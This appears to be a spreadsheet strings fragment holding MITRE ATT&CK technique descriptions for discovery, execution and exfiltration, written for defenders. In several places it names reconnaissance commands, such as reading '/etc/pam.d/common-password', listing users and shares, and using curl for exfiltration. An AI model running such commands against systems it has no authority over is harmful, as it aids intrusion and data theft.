An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as &lt;code&gt;DescribeDBInstances&lt;/code&gt; to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).</t>
  </si>
  <si>
    <t>An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time)(Citation: Technet Windows Time Service)
System time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing &lt;code&gt;net time \\hostname&lt;/code&gt; to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using &lt;code&gt;w32tm /tz&lt;/code&gt;.(Citation: Technet Windows Time Service)
On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show clock detail` can be used to see the current time configuration.(Citation: show_clock_detail_cisco_cmd)
This information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)(Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb)</t>
  </si>
  <si>
    <t>Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may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
Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as &lt;code&gt;net accounts (/domain)&lt;/code&gt;, &lt;code&gt;Get-ADDefaultDomainPasswordPolicy&lt;/code&gt;, &lt;code&gt;chage -l &lt;username&gt;&lt;/code&gt;, &lt;code&gt;cat /etc/pam.d/common-password&lt;/code&gt;, and &lt;code&gt;pwpolicy getaccountpolicies&lt;/code&gt; (Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to discover password policy information (e.g. &lt;code&gt;show aaa&lt;/code&gt;, &lt;code&gt;show aaa common-criteria policy all&lt;/code&gt;).(Citation: US-CERT-TA18-106A)
Password policies can be discovered in cloud environments using available APIs such as &lt;code&gt;GetAccountPasswordPolicy&lt;/code&gt; in AWS (Citation: AWS GetPasswordPolicy).</t>
  </si>
  <si>
    <t xml:space="preserve">
Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as &lt;code&gt;GetLocaleInfoW&lt;/code&gt; can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may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such as  [Ping](https://attack.mitre.org/software/S0097) or &lt;code&gt;net view&lt;/code&gt; using [Net](https://attack.mitre.org/software/S0039).
Adversaries may also analyze data from local host files (ex: &lt;code&gt;C:\Windows\System32\Drivers\etc\hosts&lt;/code&gt; or &lt;code&gt;/etc/hosts&lt;/code&gt;) or other passive means (such as local [Arp](https://attack.mitre.org/software/S0099) cache entries) in order to discover the presence of remote systems in an environment.
Adversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands on network devices to gather detailed information about systems within a network (e.g. &lt;code&gt;show cdp neighbors&lt;/code&gt;, &lt;code&gt;show arp&lt;/code&gt;).(Citation: US-CERT-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS May 2021)  
</t>
  </si>
  <si>
    <t>Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)
Browser information may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials In Files](https://attack.mitre.org/techniques/T1552/001) associated with logins cached by a browser.
Specific storage locations vary based on platform and/or application, but browser information is typically stored in local files and databases (e.g., `%APPDATA%/Google/Chrome`).(Citation: Chrome Roaming Profiles)</t>
  </si>
  <si>
    <t>Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Many command shell utilities can be used to obtain this information. Examples include &lt;code&gt;dir&lt;/code&gt;, &lt;code&gt;tree&lt;/code&gt;, &lt;code&gt;ls&lt;/code&gt;, &lt;code&gt;find&lt;/code&gt;, and &lt;code&gt;locate&lt;/code&gt;.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather file and directory information (e.g. &lt;code&gt;dir&lt;/code&gt;, &lt;code&gt;show flash&lt;/code&gt;, and/or &lt;code&gt;nvram&lt;/code&gt;).(Citation: US-CERT-TA18-106A)</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)
Adversaries typically abuse system features for this type of enumeration. For example, they may gather information through native system features such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) commands and [Native API](https://attack.mitre.org/techniques/T1106) functions.</t>
  </si>
  <si>
    <t>Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1134/005), [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)</t>
  </si>
  <si>
    <t>Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\&lt;DOMAIN&gt;\SYSVOL\&lt;DOMAIN&gt;\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)
Adversaries may use commands such as &lt;code&gt;gpresult&lt;/code&gt; or various publicly available PowerShell functions, such as &lt;code&gt;Get-DomainGPO&lt;/code&gt; and &lt;code&gt;Get-DomainGPOLocalGroup&lt;/code&gt;, to gather information on Group Policy settings.(Citation: Microsoft gpresult)(Citation: Github PowerShell Empire) Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. [Domain Policy Modification](https://attack.mitre.org/techniques/T1484)) for their benefit.</t>
  </si>
  <si>
    <t>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Various utilities and commands may acquire this information, including &lt;code&gt;whoami&lt;/code&gt;. In macOS and Linux, the currently logged in user can be identified with &lt;code&gt;w&lt;/code&gt; and &lt;code&gt;who&lt;/code&gt;. On macOS the &lt;code&gt;dscl . list /Users | grep -v '_'&lt;/code&gt; command can also be used to enumerate user accounts. Environment variables, such as &lt;code&gt;%USERNAME%&lt;/code&gt; and &lt;code&gt;$USER&lt;/code&gt;, may also be used to access this information.
On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show users` and `show ssh` can be used to display users currently logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)</t>
  </si>
  <si>
    <t>Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
The Registry contains a significant amount of information about the operating system, configuration, software, and security.(Citation: Wikipedia Windows Registry) Information can easily be queried using the [Reg](https://attack.mitre.org/software/S0075) utility, though other means to access the Registry exist.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t>
  </si>
  <si>
    <t>Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)).
Many OS utilities may provide information about local device drivers, such as `driverquery.exe` and the `EnumDeviceDrivers()` API function on Windows.(Citation: Microsoft Driverquery)(Citation: Microsoft EnumDeviceDrivers) Information about device drivers (as well as associated services, i.e., [System Service Discovery](https://attack.mitre.org/techniques/T1007)) may also be available in the Registry.(Citation: Microsoft Registry Drivers)
On Linux/macOS, device drivers (in the form of kernel modules) may be visible within `/dev` or using utilities such as `lsmod` and `modinfo`.(Citation: Linux Kernel Programming)(Citation: lsmod man)(Citation: modinfo man)</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021)   
Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.
Within macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a host’s registered services on the network. For example, adversaries can use a mDNS query (such as &lt;code&gt;dns-sd -B _ssh._tcp .&lt;/code&gt;) to find other systems broadcasting the ssh service.(Citation: apple doco bonjour description)(Citation: macOS APT Activity Bradley)</t>
  </si>
  <si>
    <t>Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. 
File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the &lt;code&gt;net view \\\\remotesystem&lt;/code&gt; command. It can also be used to query shared drives on the local system using &lt;code&gt;net share&lt;/code&gt;. For macOS, the &lt;code&gt;sharing -l&lt;/code&gt; command lists all shared points used for smb services.</t>
  </si>
  <si>
    <t>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Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the &lt;code&gt;systemsetup&lt;/code&gt; configuration tool on macOS. As an example, adversaries with user-level access can execute the &lt;code&gt;df -aH&lt;/code&gt; command to obtain currently mounted disks and associated freely available space. Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather detailed system information (e.g. &lt;code&gt;show version&lt;/code&gt;).(Citation: US-CERT-TA18-106A) [System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques)
Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)</t>
  </si>
  <si>
    <t>Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)), security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)), or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).
Host binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://attack.mitre.org/techniques/T1059/001) on Windows to access and/or export security event information.(Citation: WithSecure Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges as novel threat actor) In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console)
Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to discover containers and other resources that are available within a containers environment. Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster.
These resources can be viewed within web applications such as the Kubernetes dashboard or can be queried via the Docker and Kubernetes APIs.(Citation: Docker API)(Citation: Kubernetes API) In Docker, logs may leak information about the environment, such as the environment’s configuration, which services are available, and what cloud provider the victim may be utilizing. The discovery of these resources may inform an adversary’s next steps in the environment, such as how to perform lateral movement and which methods to utilize for execution. </t>
  </si>
  <si>
    <t>Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused task scheduling to potentially mask one-time execution under a trusted system process.(Citation: ProofPoint Serpent)</t>
  </si>
  <si>
    <t>Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
There are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).
Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various [Remote Services](https://attack.mitre.org/techniques/T1021) in order to achieve remote Execution.(Citation: Powershell Remote Commands)(Citation: Cisco IOS Software Integrity Assurance - Command History)(Citation: Remote Shell Execution in Python)</t>
  </si>
  <si>
    <t>Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. 
Adversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Linux environments support several different IPC mechanisms, two of which being sockets and pipes.(Citation: Linux IPC) Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms. Adversaries may also use [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) to facilitate remote IPC execution.(Citation: Fireeye Hunting COM June 2019)</t>
  </si>
  <si>
    <t>An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
While [User Execution](https://attack.mitre.org/techniques/T1204)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
Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary, or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204). For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)</t>
  </si>
  <si>
    <t>Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services either locally or remotely. Many services are set to run at boot, which can aid in achieving persistence ([Create or Modify System Process](https://attack.mitre.org/techniques/T1543)), but adversaries can also abuse services for one-time or temporary execution.</t>
  </si>
  <si>
    <t>Adversaries may exploit software vulnerabilities in client applications to execute code. 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
Several types exist:
### Browser-based Exploitation
Web browsers are a common target through [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) and [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.
### Office Applications
Common office and productivity applications such as Microsoft Office are also targeted through [Phishing](https://attack.mitre.org/techniques/T1566). Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.
### Common Third-party Applications
Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.</t>
  </si>
  <si>
    <t>Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Adversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system.
Native API functions (such as &lt;code&gt;NtCreateProcess&lt;/code&gt;) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries.(Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API &lt;code&gt;CreateProcess()&lt;/code&gt; or GNU &lt;code&gt;fork()&lt;/code&gt; will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)
Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)
Adversaries may use assembly to directly or in-directly invoke syscalls in an attempt to subvert defensive sensors and detection signatures such as user mode API-hooks.(Citation: Redops Syscalls) Adversaries may also attempt to tamper with sensors and defensive tools associated with API monitoring, such as unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001).</t>
  </si>
  <si>
    <t>Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)
In Docker, adversaries may specify an entrypoint during container deployment that executes a script or command, or they may use a command such as &lt;code&gt;docker exec&lt;/code&gt; to execute a command within a running container.(Citation: Docker Entrypoint)(Citation: Docker Exec) In Kubernetes, if an adversary has sufficient permissions, they may gain remote execution in a container in the cluster via interaction with the Kubernetes API server, the kubelet, or by running a command such as &lt;code&gt;kubectl exec&lt;/code&gt;.(Citation: Kubectl Exec Get Shell)</t>
  </si>
  <si>
    <t>Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., [Native API](https://attack.mitre.org/techniques/T1106)).
Adversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, adversaries can modularize functionality of their malware into shared objects that perform various functions such as managing C2 network communications or execution of specific actions on objective.
The Linux &amp; macOS module loader can load and execute shared objects from arbitrary local paths. This functionality resides in `dlfcn.h` in functions such as `dlopen` and `dlsym`. Although macOS can execute `.so` files, common practice uses `.dylib` files.(Citation: Apple Dev Dynamic Libraries)(Citation: Linux Shared Libraries)(Citation: RotaJakiro 2021 netlab360 analysis)(Citation: Unit42 OceanLotus 2017)
The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in `NTDLL.dll` and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like `LoadLibrary` at run time.(Citation: Microsoft DLL)</t>
  </si>
  <si>
    <t>Adversaries may abuse serverless computing, integration, and automation services to execute arbitrary code in cloud environments. Many cloud providers offer a variety of serverless resources, including compute engines, application integration services, and web servers. 
Adversaries may abuse these resources in various ways as a means of executing arbitrary commands. For example, adversaries may use serverless functions to execute malicious code, such as crypto-mining malware (i.e. [Resource Hijacking](https://attack.mitre.org/techniques/T1496)).(Citation: Cado Security Denonia) Adversaries may also create functions that enable further compromise of the cloud environment. For example, an adversary may use the `IAM:PassRole` permission in AWS or the `iam.serviceAccounts.actAs` permission in Google Cloud to add [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) to a serverless cloud function, which may then be able to perform actions the original user cannot.(Citation: Rhino Security Labs AWS Privilege Escalation)(Citation: Rhingo Security Labs GCP Privilege Escalation)
Serverless functions can also be invoked in response to cloud events (i.e. [Event Triggered Execution](https://attack.mitre.org/techniques/T1546)), potentially enabling persistent execution over time. For example, in AWS environments, an adversary may create a Lambda function that automatically adds [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user and a corresponding CloudWatch events rule that invokes that function whenever a new user is created.(Citation: Backdooring an AWS account) Similarly, an adversary may create a Power Automate workflow in Office 365 environments that forwards all emails a user receives or creates anonymous sharing links whenever a user is granted access to a document in SharePoint.(Citation: Varonis Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)</t>
  </si>
  <si>
    <t>Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) (WinRM).(Citation: MSDN WMI) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: MSDN WMI)(Citation: FireEye WMI 2015)
An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)</t>
  </si>
  <si>
    <t>Adversaries may abuse cloud management services to execute commands within virtual machines or hybrid-joined devices. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. Similarly, in Azure AD environments, Microsoft Endpoint Manager allows Global or Intune Administrators to run scripts as SYSTEM on on-premises devices joined to the Azure AD.(Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)(Citation: SpecterOps Lateral Movement from Azure to On-Prem AD 2020)
If an adversary gains administrative access to a cloud environment, they may be able to abuse cloud management services to execute commands in the environment’s virtual machines or on-premises hybrid-joined devices. Additionally, an adversary that compromises a service provider or delegated administrator account may similarly be able to leverage a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) to execute commands in connected virtual machines.(Citation: MSTIC Nobelium Oct 2021)</t>
  </si>
  <si>
    <t>Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, HBSS, Altiris, etc.).  
Access to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints. Network infrastructure may also have administration tools that can be similarly abused by adversaries. (Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)
The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform it's intended purpose.</t>
  </si>
  <si>
    <t>Adversaries may attempt to exfiltrate data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may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.</t>
  </si>
  <si>
    <t>Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.
Web service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection.</t>
  </si>
  <si>
    <t>Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.  
Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. 
[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016) On macOS and Linux &lt;code&gt;curl&lt;/code&gt; may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.(Citation: 20 macOS Common Tools and Techniques)
Many IaaS and SaaS platforms (such as Microsoft Exchange, Microsoft SharePoint, GitHub, and AWS S3) support the direct download of files, emails, source code, and other sensitive information via the web console or [Cloud API](https://attack.mitre.org/techniques/T1059/009).</t>
  </si>
  <si>
    <t>Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection. 
When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).</t>
  </si>
  <si>
    <t>Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.</t>
  </si>
  <si>
    <t>An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.</t>
  </si>
  <si>
    <t>Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive. 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</si>
  <si>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Adversaries may schedule data exfiltration to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C2 Channel](https://attack.mitre.org/techniques/T1041) or [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may exfiltrate data by transferring the data, including backups of cloud environments, to another cloud account they control on the same service to avoid typical file transfers/downloads and network-based exfiltration detection.
A defender who is monitoring for large transfers to outside the cloud environment through normal file transfers or over command and control channels may not be watching for data transfers to another account within the same cloud provider. Such transfers may utilize existing cloud provider APIs and the internal address space of the cloud provider to blend into normal traffic or avoid data transfers over external network interfaces.
Incidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.(Citation: DOJ GRU Indictment Jul 2018) </t>
  </si>
  <si>
